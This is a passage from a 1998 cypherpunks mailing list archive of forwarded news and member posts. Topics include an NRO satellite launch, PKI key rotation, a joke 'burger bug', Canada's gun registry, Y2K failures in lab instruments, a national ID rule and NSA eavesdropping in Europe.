have expressed a prior interest in receiving this information for purpose
of laughs and giggles only.
-----------------------


________________________________________________________________
  Mark Hedges      hedges@infopeace.com      www.infopeace.com

  "One does not establish a dictatorship in order to safeguard
  a revolution; one makes the revolution in order to establish
  a dictatorship."  O'Brien from 1984, George Orwell
________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 24 Sep 1998 12:24:25 +0800
To: cypherpunks@cyberpass.net
Subject: NRO goes COTS: "Born Secret" ain't what it used to be...
Message-ID: <v0401175db23026868cd7@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
Date: Thu, 24 Sep 1998 01:52:01 -0400
From: Richard Sampson <rjsa@sprintmail.com>
Organization: Unknown Organization
MIME-Version: 1.0
To: "ignition-point@majordomo.pobox.com" <ignition-point@majordomo.pobox.com>
Subject: IP: NRO TO LAUNCH SATELLITE TO EXPLORE TECHNOLOGIES By Frank Wolfe
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: Richard Sampson <rjsa@sprintmail.com>
Status: U

NRO TO LAUNCH SATELLITE TO EXPLORE TECHNOLOGIES By Frank Wolfe
  Sep. 23, 1998 (DEFENSE DAILY, Vol. 200, No. 24 via COMTEX) --
CHANTILLY, Va.-The National Reconnaissance Office (NRO) plans to launch
the Space Technology Experiment (STEX) satellite Oct. 1 at Vandenberg
AFB, Calif., to test and validate 29 new technologies.

"The NRO recognizes the national need and challenges of providing
future overhead collection systems with good performance at reduced
cost, so we're aggressively pursuing technology options," John Schaub,
the STEX program director, told reporters yesterday at NRO headquarters
here.

The STEX satellite is the first the NRO has announced prior to launch,
officials said. With the end of the Cold War and the shrinking defense
budget, NRO now believes it needs to justify its programs in a more
open forum, officials said.

Launched aboard an Orbital Sciences Corp. [ORB] Taurus launch vehicle,
STEX is designed to explore new commercial-off-the-shelf (COTS)
technologies to enhance future space missions, like overhead
collection, at a lower cost. The 1,540-pound satellite is designed to
last two years in space.

The STEX program began three years ago when NRO partnered with
Lockheed Martin [LMT] in Colorado, the Naval Research Laboratory and
the Air Force Research Laboratory.

The cost of the satellite--its booster, launch costs and ground
support--is less than $90 million, the NRO said.

"Keeping the schedule short was a key contributor to keeping the total
costs low," Schaub said. "It's significantly cheaper."

NRO director Keith Hall has said he wants to increase NRO's research
and development efforts from 8 percent to 10 percent of the agency's
total budget and STEX is part of that plan (Defense Daily, May 26).

STEX is the first in a series of low-cost demonstrations by the NRO's
Advanced Systems and Technology Directorate.

The technologies to be tested aboard STEX include an Electric
Propulsion Demonstration Module using a Russian-built engine, a 51-
gigabit solid state data recorder (the world's largest), multifunction
solar cells, high-density nickel-hydrogen batteries and an Advanced
Tether Experiment, Schaub said.

The NRO hopes the Advanced Tether Experiment, which is to use four
miles of Spectra 1000-reinforced tether deployed from the satellite,
will boost the agency's knowledge about how to do such things as
raising and lowering spacecraft by tethers and how to increase the
survivability of tethered space systems.

"The program has really managed in a streamlined way. We've used
commercial practices attempting to speed the development of low cost
next generation spacecraft. It's the NRO's version of better, faster,
cheaper," Schaub said.

-0-

Copyright Phillips Publishing, Inc.


News provided by COMTEX.
[!BUSINESS] [!HIGHTECH] [!INFOTECH] [!PUBLIC+COMPANIES] [!WALL+STREET]
[AIR+FORCE] [BUDGET] [COLORADO] [NEWS] [NEWSGRID] [NICKEL] [PHL] [POUND]
[RESEARCH] [TECHNOLOGY] [WAR]


--
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a
prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------





**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 24 Sep 1998 12:21:08 +0800
To: cypherpunks@cyberpass.net
Subject: hurricanes and digital commerce and financial cryptography
Message-ID: <v0401175fb23027a6d091@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Sender: rodney@module-one.tillerman.nu
Date: Thu, 24 Sep 1998 07:32:20 -0400
To: dcsb@ai.mit.edu
From: Rodney Thayer <rodney@tillerman.nu>
Subject: hurricanes and digital commerce and financial cryptography
Mime-Version: 1.0
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Rodney Thayer <rodney@tillerman.nu>
Status: U

Ok, Anguilla has had it's liter of rainwater worth
of fame from this damn hurricane.  Time for South Florida.
So, ahem,...

It's Thursday and there's a hurricane coming.

There's plenty of beer in the starboard refrigerator and plenty
of frozen White Castle hamburgers in the port refrigerator.
The gas generator is all set to keep the server and the notebook
PC battery chargers running.  The local badly run telephone monopoly
claims it can keep the telephone network up, we'll see if they are
telling the truth when there's a foot of water on the road.

In spit of the crypto-refugee claims, there's plenty of crypto
work here, and this 'offshore' location is only about 100 feet
from the mainland so it's not actually exporting code when I
drive back to the office from the local computer store with the
PC in my car.

Here's my commerce question.  How often do people expect to cycle
private keys from PKI systems?  I mean, suppose you have a web
server, or an IPSec router, or some related device.  I would
assume you'd actually generate a new key pair every time you
get a new certificate.  So, for example, if you get a new
certificate every six months for a web server, you would use
a new private key.

It turns out there is some debate over this.  Some people assume
the private key lives essentially forever, and that you'd simply
get a new certificate against the same old key pair.  I myself
think this is rock stupid because one of the threat models is
that the private key gets stolen, and the longer it's used the
longer it's stealable.

This relates to hurricanes.

If you know any IPSec-aware routers, or any secure web servers,
or any other PKI-based devices, and they are in the Florida Keys,
you had better assume they'll need new key pairs as of some time Sunday.
You see, unless I've missed the "waterproofing" requirements in
FIPS 140 (the government security hardware standard), then those
boxes will all be under water and will require replacement.  So any
of these PKI Service Provider models that assume the private key is
immortal are about to be proven wrong.  And there better be something
in your revocation procedure for "the private key was destroyed by
an act of nature".  Look that up in your CPS and your Digital Signature
legislation.

But I need to go prepare, it's supposed to start getting exciting here
in Clearwater, some time today.

[I pass the torch to some DCSB subscriber in the New Orleans area...]

--------
Rodney Thayer <rodney@tillerman.nu>

"layer of sand separate transmitted and received packets".
(with apologies to Keith Law son.)


For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 24 Sep 1998 14:09:39 +0800
To: cypherpunks@cyberpass.net
Subject: Crisis in the Burg: the 100GB Bug
Message-ID: <v0401176eb2304431871e@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Thu, 24 Sep 1998 14:47:22 -0400
X-Authentication-Warning: qnx.com: localhost [127.0.0.1] didn't use HELO
protocol
To: 0xdeadbeef@substance.abuse.blackdown.org
Subject: Crisis in the Burg: the 100GB Bug
Date: Thu, 24 Sep 1998 14:29:38 -0400
From: glen mccready <glen@qnx.com>
Resent-From: 0xdeadbeef@substance.abuse.blackdown.org
X-Mailing-List: <0xdeadbeef@substance.abuse.blackdown.org> archive/latest/212
X-Loop: 0xdeadbeef@substance.abuse.blackdown.org
Precedence: list
Resent-Sender: 0xdeadbeef-request@substance.abuse.blackdown.org


Forwarded-by: nev@bostic.com
Forwarded-by: Dave Del Torto <ddt@lsd.com>
Forwarded-by: Victor Milan, FBNS
Forwarded-By: Charles Reuben <buytexas@swbell.net>

EXPERTS WARN OF THREAT FROM 100GB BUG

Firebringer News Service (FBNS) - Experts warned today of a new and deadly
threat to our beleaguered civilization: the 100GB Bug.

As most people know, McDonald's restaurant signs show the number of
hamburgers the giant chain has sold. That number now stands at 99 billion
burgers, or 99 Gigaburgers (GB). Within months or even weeks, that number
will roll over to 100GB.

McDonald's signs, however, were designed years ago, when the prospect of
selling one hundred billion hamburgers seemed unthinkably remote. So the
signs have only two decimal places.

This means that, after the sale of the 100 billionth burger, McDonald's
signs will read "00 Billion Burgers Sold." This, experts predict, will
convince the public that, in over thirty years, no McDonald's hamburgers
have ever in fact been sold, causing a complete collapse of consumer
confidence in McDonald's products.

The ensuing catastrophic drop in sales is seen as almost certain to force
the already-troubled company into bankruptcy. This, in turn, will push
the teetering American economy over the brink, which, finally, will
complete the total devastation of the global economy, ending civilization
as we know it, and forcing us all to live on beetles.

"The people who know -- the sign-makers -- are really scared of 100GB,"
one expert said. "I don't know about you, but I'm digging up a copy of
THE FIELD GUIDE TO NORTH AMERICAN INSECTS and heading for the hills."

###

reported by Victor Milan, FBNS
forward freely, please attribute

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Thu, 24 Sep 1998 22:17:09 +0800
To: "Me Michel Kelly-Gagnon" <Alexdoulis@aol.com>
Subject: Waste of money.
Message-ID: <199809250306.XAA28614@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



====== forwarded from Canadian Firearms Digest, V2 # 605 ==========
Date: Thu, 24 Sep 1998 10:22:34 -0600
From: "David BREWERTON" <brewerd@shaw.wave.ca>
Subject: FedUp II rally

To the Editor, Halifax Herald:
Regarding your "Sticking to their guns" article. I would like to correct
a few inaccuracies in your piece.
1> "..to join about 8,000 others at the Fed Up II Rally.." - the RCMP
estimate was 30,000 people, one of the largest if not THE largest rally
ever on Parliament Hill.

2>"The new law, Bill C-68, will come into effect on Dec. 1, two months
after it was first scheduled to be implemented." NO, this is the FIFTH
extension of it's implementation date, now totalling three years.

3>"Ms. McLellan said the delay was at the request of Ontario law     
enforcement officials and not due to problems with the federal       
government's new system." FALSE, only 8 days before the law was
scheduled to go into effect, gun dealers and Police departments still do
not have the information on how to comply with the law. Confirm this
with the Provincial Firearms Officers - they don't have the information
yet. The fault is Federal. I asked gun dealers here and confirmed this
with them, they still have nothing from the Federal government.

4>"Ms. McLellan said the program is still expected to cost about $185
million over the first five years" NO, they've already spent $135
million (that they'll acknowledge) THIS YEAR ALONE, and $250+ million so
far in 3 years before registering a single firearm and they claim $60
million annually to run it. That's impossible since the current handgun
registration system costs just under $100 per gun to register and with
estimates (RCMP) of up to 25 million guns in Canada, that's $2.5 BILLION
to do the job. Add to that the $200 million the Canadian Police
Association must have to upgrade it's computer system to use the data
from this system, the price is now somewhere around $3 Billion. That
would help a lot of Hep-C victims and cancer patients.

5>"The minister also denied the government has a secret agenda to 
confiscate everyone's guns and use the registry to let the police know
where to find firearms." False, since the goverment has already
announced that they're turning 58% of the legitimately owned handguns in
Canada into prohibited firearms and confiscating them without
compensation. (Also illegal under the Charter of Rights) As for the
Police access to the information - that was the main selling point by
the Liberals to get the Canadian Police Chiefs to agree to support it.
They were to have this information before going into a house to be
prepared for any eventuality. They've now been informed that the system
won't give them that information. The support of main line Police
officers doesn't exist either. 85-91% of officers surveyed in several
provinces (where their leaders would allow the survey to be done) say
that they don't support the law.


Please, lets keep the facts straight on this. There are 7 million people
in this country who own firearms (RCMP estimates) and they're all voters
and taxpayers. The utter waste of some $3 Billion on something with
early estimates of a minimum 50% error rate (from the Ministers Select
group of firearms experts) that will do nothing to combat crime since
criminals won't register their guns and 90% of firearms crime (RCMP
figures) is done with unregistered handguns which have had mandatory
registration since 1934, cannot be tolerated. The NFA put together a
system of firearm owner licensing some 30 years ago that would take care
of most of what the government theoretically wants to accomplish with a
very low cost. They refuse to consider it. The existing handgun registry
has an estimated 30-45% error rate and even the courts refuse to accept
data from it in court since it's so inaccurate. 
The Federal government can't even get their figures straight, since
their numbers don't match either the RCMP or StatsCan figures for crime
rates. They were caught inflating RCMP crime figures by 900% to
strengthen their case in the Alberta Court of Appeal. They used the
argument that even if a firearm was present at a location (locked in a
gun safe and not involved in the crime) then it was a firearm crime.
That's like saying that if there's a domestic dispute in a home and
there's a car in the driveway then it's an automobile accident. That
doesn't wash with me, I don't know about you.
Please, lets keep the facts straight so that your readers can make an
accurate assessment of the news, not a distorted one.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 24 Sep 1998 16:02:03 +0800
To: "Vladimir Z. Nuri" <cypherpunks@cyberpass.net
Subject: Re: IP: Privacy: FTC Losing Patience w/Business
In-Reply-To: <199809240731.AAA25674@netcom13.netcom.com>
Message-ID: <v04011703b2300e2f60ae@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:31 AM -0500 9/24/98, Vladimir Z. Nuri wrote:
>From: believer@telepath.com
>Subject: IP: Privacy: FTC Losing Patience w/Business
>Date: Wed, 23 Sep 1998 07:33:09 -0500
>To: believer@telepath.com
>
>Source:  New York Times
>http://www.nytimes.com/library/tech/98/09/biztech/articles/21privacy.html
>
>September 21, 1998
>
>F.T.C. 'Losing Patience' With Business on
>A site called Soccer Patch (www.soccerpatch.com) is a trading post for
>soccer-playing children who want to trade team patches. It lists the names,
>e-mail addresses and in some cases the hometowns of children who want to
>trade patches. That is a red flag for F.T.C. enforcers. They worry that
>child molesters can use the information to find victims.

	Since when is it the job of the F.T.C worry about child molesters?

--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@ctv.es>
Date: Wed, 23 Sep 1998 10:00:10 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <3.0.3.32.19980924170248.006b469c@pop.ctv.es>
MIME-Version: 1.0
Content-Type: text/plain



> Don't most memory scans do a keyscan anyway? looking for an ESC to 
>bypass the scan? So have it also check for something else to bring up 
>your special routine. It should pass all but the most detailed signature 
>analysis.
>

Also most BIOS'es scan for the <DEL> key (or other combinations) in order
to jump to the BIOS config screens. From here you have two options: 1) add
a second possible jump directly to hidden configuration for the HD, or 2)
within the Bios configuration menu add a scanner for a key sequence to
enable the blacked out HD sectors.

I can't imagine that anyone that wasn't already sure that you were playing
tricks with the HD would be able to detect either of these on a normal
startup. Again I think the key is that it would vastly expensive and very
time consuming for customs services to make more than a cursory check. More
and more people are carrying notebooks with them on trips and just like
most bag searching has ended due to very fast, but not perfect, technology,
notebook scanning is limited by the very important public factor--the
people waiting in line behind you will tend to get very anxious. :)

If on the other hand you are a "real" suspect then you best bet is not to
carry a PC into these countries. These techniques (all of the ones
mentioned in this thread) may even have a decent life-span if the ones that
want to get you are locals (ie. street cops), but as has been pointed out
before they don't have to know what's on your HD to place you under
psychiatric evaluation, etc. 

I think perhaps a tougher question is, "Is there a way, without resorting
to bloodshed, to regain control of our private property and private lives?"

That's not a troll! I know that there are a lot people on this list with
their assault rifles at the ready, that are convinced that only armed
resistance will work. But. I think that's the "easy" way out. (How) can it
be done another way? Especially, given the fact that so much progress has
already been made by the very Anti-American US Government and others.

How do we get back our civil rights that have been so eroded over the past
40 years? Is it too late? Are people in general so comfortable that liberty
isn't important anymore? 

Why is it that almost every state has a system for introducing legislation
at the popular level (referendum) but we don't have that freedom at the fed
level.  I wonder what the feds would do if we the sheeple could put
propositions on the federal budget. Imagine...Prop PGP: no export control
on crypto or work performed by US citizens living abroad; Prop 666: strict
public oversight on CIA/NSA/FBI wiretapping and surveillance activities;
add your favorite proposition here...

eor..

Al Franco, II
I can't sign this with crypto because the bastards might use it to try to
"prove" that I have illegally exported software (that can be freely
obtained in places outside the US). 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 24 Sep 1998 19:22:08 +0800
To: sjmz@hplb.hpl.hp.com
Subject: salman rushdie
Message-ID: <360ADE95.4B33@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

dave
---
ABQ J 9/24/98 
Iran May Withdraw
Writer's Death Threat

LONDON - Author Salman
Rushdie met with British Foreign
Office officials Wednesday amid
reports Iran is preparing to
withdraw the threat on his life.
The late Ayatollah Ruhollah
Khomeini pronounced a "fatwa," death sentence, 
against Rushdie in
1989 after the publication of his
book "Satanic Verses," which many
Muslims deemed blasphemous.
Islamic militants then put a $2
million bounty on Rushdie's head,
forcing the author to live largely in
under British police protection.
---

I THINK that I heard tonight and saw 
Rushie's picture on TV that the above
was called off.

Progress.

I am reading again your stuff at
http://www.jya.com/filth-spot.htm

Let's all hope for release of the requested documents
and SETTLEMENT.

bill

Title: Black and White Test of Cryptographic Algorithms




	

	
		
			
				
					Jump to Forum
					Click Image to Jump to Next Article 
					Go to Text Only Print Version 
				
			
			
			Black and White Test
			of Cryptographic Algorithms
			by William H. Payne
			This article requires special formatting.
			Please Click Here to Read
			
				Send This Article to a Friend:
				
					
						
						 
					
						
							Your Name:
					
					
						
							
					
				
				
					 
					
						
							Email Address of your Friend: 
					
					
						
							
					
				
				
					 
					
						
							Your Email address:
					
					
						
							
					
				
				
					 
					 
					 
				
				
					 
					
						
							
					
				
			
			 
			Back to Home Page
			Quick Menu 
			Visit the Button Shop 
			
			
			Interactive Forum
			Black and White Test
			of Cryptographic Algorithms
			
			
			
			
			
			E-mail the Editor
			
			
			
			
			
			
			 
		
	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 26 Sep 1998 13:38:06 +0800
To: Blanc <blancw@cnw.com>
Subject: Re: Is Toto in Kansas, or in MO
In-Reply-To: <000401bde8e0$2dd516e0$388195cf@blanc>
Message-ID: <Pine.BSF.3.91.980924181600.21078A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain





On Fri, 25 Sep 1998, Blanc wrote:

> 
> Who said this, "Toto":
> 
>    	"A long time ago, being crazy meant something.
>   	"Now, everybody's crazy."
> 
>     ?

Charles Manson.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 24 Sep 1998 22:17:09 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Jury duty considered harmful, or at least rare
In-Reply-To: <199809240225.TAA21955@proxy4.ba.best.com>
Message-ID: <199809250319.UAA07944@proxy4.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 9:12 PM -0500 9/23/98, James A. Donald wrote:
> > To rig a jury by excluding undesirables such as Tim May
> > would be far too laborious.  To rig a jury it would be
> > necessary to

At 09:52 AM 9/24/98 -0500, Petro wrote:
> No, no, On the contrary, far too easy.
>
> There are certain people who are NEVER called to jury duty,
> people convicted of felonies & etc. simply put the name of
> an undesirable on this list, 

The number of identifiable undesirables is too small to
guarantee the desired trial outcome.  To ensure a desired
outcome it would be necessary to screen out a very large
number of potential undesirables.  It would be much easier to
screen in a small number of desirables.

> > and simple statistics would show this up.

> If anyone were to look.

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     M+t9fZl1uB+ChARqSR+DFzmoEJWNgr/rn5RGHaZA
     4/GeYPAq0AtkguzZ+40UycomDZMeuRMUpYyjzWHDJ

-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 24 Sep 1998 22:25:26 +0800
To: cypherpunks@cyberpass.net
Subject: IP: National ID
Message-ID: <199809250327.UAA03872@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Larry Becraft <becraft@hiwaay.net>
Subject: IP: National ID
Date: Wed, 23 Sep 1998 17:17:56 -0500
To: ignition-point@majordomo.pobox.com

To Whom It May Concern,

    Lots of people are interested in fighting the national ID and lots
of info and even suggested letters to object to the proposed regulation
are posted to Scott McDonald's webpage which is accessed thru:

                        http://www.networkusa.org/index.shtml

Also attached to this note is my letter of objection which you may
personalize and send to the DoT. This letter was the 4th objection
submitted to the DoT.

    The reason I write now is because we have only about another week
(Oct. 2) to get in more objections to this regulation. I have just
visited the DoT webpage and found that there are about 2100 objections.
We need many more. The DoT webpage lists all the people who have
submitted objections and I have read the names of every objector.
Remarkably, many of the people that I thought would submit an objection
have not. If you have not, please do so immediately.

    If you don't object to this regulation, then I suggest keeping your
mouth shut if this reg is adopted. Please, it should not take very long
for you to personalize the attached letter and send it in. Thanks very
much.

                                        Larry Becraft



Attachment Converted: "c:\eudora\attach\FedRegObjection.rtf"






**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 24 Sep 1998 22:25:42 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Y2K Horror Stories a Foretaste of Breakdowns to Come
Message-ID: <199809250327.UAA03883@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Y2K Horror Stories a Foretaste of Breakdowns to Come
Date: Wed, 23 Sep 1998 23:08:03 -0500
To: ignition-point@majordomo.pobox.com

Source:  http://www.garynorth.com/y2k/detail_.cfm/2665

Category: Noncompliant_Chips
Date: 1998-09-23 11:10:48
Subject: Horror Stories That Are a Foretaste of Breakdowns to Come
Link:  http://www.greenspun.com/bboard/q-and-a-fetch-msg.tcl?msg_id=000AUk

Comment: 

This document speaks for itself. Mutiply this through every institution
that uses embedded systems. 

There is a lesson here. Any time anyone tells you, "This will work. No
problem," ask him to demonstrate how it will work with no problem. 

Companies are just like governments. They stonewall. They pretend. They
lie. Mainly, when caught, they lie. "I did not have noncompliance with that
product!" 

This was especially interesting: 

"Nearly a month after I sent email to two different year 2000 addresses at
the company, I received a phone call from the company. The caller described
herself as a liaison with technical support and admitted to having no
technical knowledge of the instrument. She said that their legal department
would only allow verbal communication in this matter. She was prohibited
from replying by email or written communication. 

"She said the embedded systems 'could be a problem' if new firmware wasn't
installed. When questioned, she admitted that new firmware was not
available and she did not know when it would be." 

Substitute the term "Western civilization" for "new firmware." 

* * * * * * * * * * * 

I am an analytical chemist specializing in inductively coupled plasma
atomic emission spectroscopy (ICP-AES). ICP-AES is a method used to
determine trace amounts of metals in solutions in the part per million and
part per billion range. 

I am responsible for two spectrometers each of which cost approximately
$130,000. Both instruments contain embedded microprocessor systems that are
in turn controlled by external computers. 

The first uses a PDP-11/53 for the external computer. It is running the
instrument control software under RT-11 and TSX-Plus. No hardware real time
clock exists in the system. This version of RT-11 only accepts 1979 to
1999 as valid years for the system clock. There is no 2000 or 00. If left
powered up, the system clock rolls over from 99 to 100. The file system is
not designed to handle dates outside of the 79 to 99 range. A compliant
version of RT-11 has just become available, but the manufacturer of the
instrument says this won't help with problems in the instrument control
software. We have been told that the software will "crash and burn" when hit
with year 2000.  

The instrument was manufactured in 1988 and the software is no longer
supported by the company. In fact, the company no longer employs anyone who
worked on the Fortran source. The company's solution is to replace the
PDP-11 with a PC and purchase a $6000 software package that runs under
Windows. If we did this, we would no longer be able to use the quality
control and data transfer programs we have written for the current system.
We would also have several weeks of down time while entering our current
analytical methods into the new system. My experience with a beta version
of the PC software leads me to believe productivity would suffer in the end.  

The second instrument was controlled with a DEC 466 (486-66) running
instrument control software under SCO-UNIX System V/386 Release 3.2. This
system became very confused after the real time clock (RTC) was set to
12/31/99. 

Allowing the clock to roll over with the power off gave a RTC date of 1900.
On boot up, Unix said the system year was 2000. However, the instrument
software reported the current date as 01/01/10 and the RTC was reset to 1970. 

With the RTC set to 2000, the instrument software still reported the date
as 01/01/10, but now the RTC was reset to 2070. On the next boot up, Unix
would report the system date as 1970. At any time, typing in 000101 in the
yymmdd field on boot up resulted in the RTC being reset to 1970. SCO has a
patch for the operating system, but again this would not solve problems in
the instrument control software. 

In this case, we have replaced the 486 with a Y2k compliant Pentium 300 and
installed instrument control software that runs under Windows 95. The
manufacturer no longer supports the software that ran under Unix. The
instrument is two years old. 

Inside the instrument are two embedded 68000 microprocessor systems with
real time clocks. Access to the clocks requires a program normally supplied
only to service technicians. Execution of that program requires a
password. The real time clocks can run without external power for up to ten
years on internal lithium batteries. 

One function of the clocks is to insure the proper start-up sequence is
followed after shutdowns of different lengths (hot or cold start).
Extensive damage could be caused by an error in the control of heating,
cooling, or
gas flow systems. The clocks are also used in the monitoring of safety
interlocks and sensors. Both clocks rollover from 1999 to 1900 and can not
be set to 2000. The clocks also count off the days of the week. I am
reluctant to extensively test the system myself because of the possibility
of damage. 

When I first talked to technical support about my concerns, the technician
pulled out a copy of the year 2000 compliance certificate for the new
software and read it over. He then stated: "This certification only covers the
software - not the *instrument*." This instrument and software is being
sold as the company's year 2000 solution to replace almost all earlier
systems.  

My next contact was with a different technician who was in the lab to
repair an electronic problem in the instrument. He told me: "Don't worry,
we use four digit dates." I asked him to demonstrate setting the clocks
ahead. He ran the program on the main computer and it allowed him to type
the year 2000 on the entry screen. He then executed the command to send the
date to the embedded system. There were no error messages. He gave me a
look that implied "I told you so". I then asked him to read back the
current time from the clock he just set. He was visibly startled when he
saw 1900 appear on the screen. He said he would have one of their experts
call me.  

A few days later I heard from the "expert" who tried to reassure me with
phrases like "they're just timers" and "the instrument doesn't _need_ to
know what day it is". However, since he didn't seem to have a mastery of
what the clocks actually do, I wasn't reassured. For example: I can put the
instrument into standby (sleep mode) over the weekend with instructions to
be ready to operate at 8:00 AM Monday. This will conserve gases (nitrogen
and argon) and reduce power needs. 73 minutes before the assigned ready
time, the embedded systems will query the main computer for start-up
instructions. If the main system is running, it takes control of the
sequence. If the main system is off, the embedded systems will look for it
for 10 minutes and then independently begin the start-up sequence in the
instrument EPROM. The "expert" didn't seem to have even this depth of
knowledge of the system.  

Nearly a month after I sent email to two different year 2000 addresses at
the company, I received a phone call from the company. The caller described
herself as a liaison with technical support and admitted to having no
technical knowledge of the instrument. She said that their legal department
would only allow verbal communication in this matter. She was prohibited
from replying by email or written communication. 

She said the embedded systems "could be a problem" if new firmware wasn't
installed. When questioned, she admitted that new firmware was not
available and she did not know when it would be. 

She also said that the clocks were used for the "wake up" procedure and not
used for anything else. Since she had no knowledge of the instrument, there
was no point in asking about system error (SYSERROR) message 75 described
in the appendix of the manual: 

75 Real-Time Clock. Call Service. 

The real-time clock, used to monitor the status of interlocks (and
sensors), is not functioning. This will not shut down the system; however,
a XXXXXXXX service engineer should be contacted. 

"This will not shut down the system" means I can start up a sustained
10,000 degree plasma in a confined space with uncertainty as to whether the
interlocks and sensors will detect a malfunction. 

It's my belief that in thinking about embedded systems, this company has
been in "sleep mode". I may have been the first to sound a "wake up" alarm
about this instrument. Now they have to muster the people and resources to
re-write the programs stored in the EPROM's, produce new chips, and install
them in hundreds of instruments around the world. I should also mention
that this is only one instrument in a large product line that has other Y2k
problems. Will they get them all done? On time? I don't think they know. 

 Link: http://www.greenspun.com/bboard/q-and-a-fetch-msg.tcl?msg_id=000AUk 
----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------






**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 24 Sep 1998 22:26:43 +0800
To: cypherpunks@cyberpass.net
Subject: IP: NSA listening practices called European`threat'
Message-ID: <199809250327.UAA03893@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: NSA listening practices called European`threat'
Date: Thu, 24 Sep 1998 14:54:05 -0500
To: believer@telepath.com

Source:  Baltimore Sun
http://www.sunspot.net/cgi-bin/editorial/story.cgi?storyid=900000194001

NSA listening practices called European`threat'
European Parliament report accuses agency of widespread spying 

By Neal Thompson 
Sun Staff

The National Security Agency has incurred the wrath of some U.S.
allies and triggered debate about increased global eavesdropping,
thanks to a new report that accuses the agency of spying on
European citizens and companies.

With the help of a listening post in the moors of northern England,
NSA for nearly a decade has been snatching Europe's electronic
communications signals, according to a report for the European
Parliament.

"Within Europe, all e-mail, telephone and fax communications are
routinely intercepted by the United States National Security Agency,
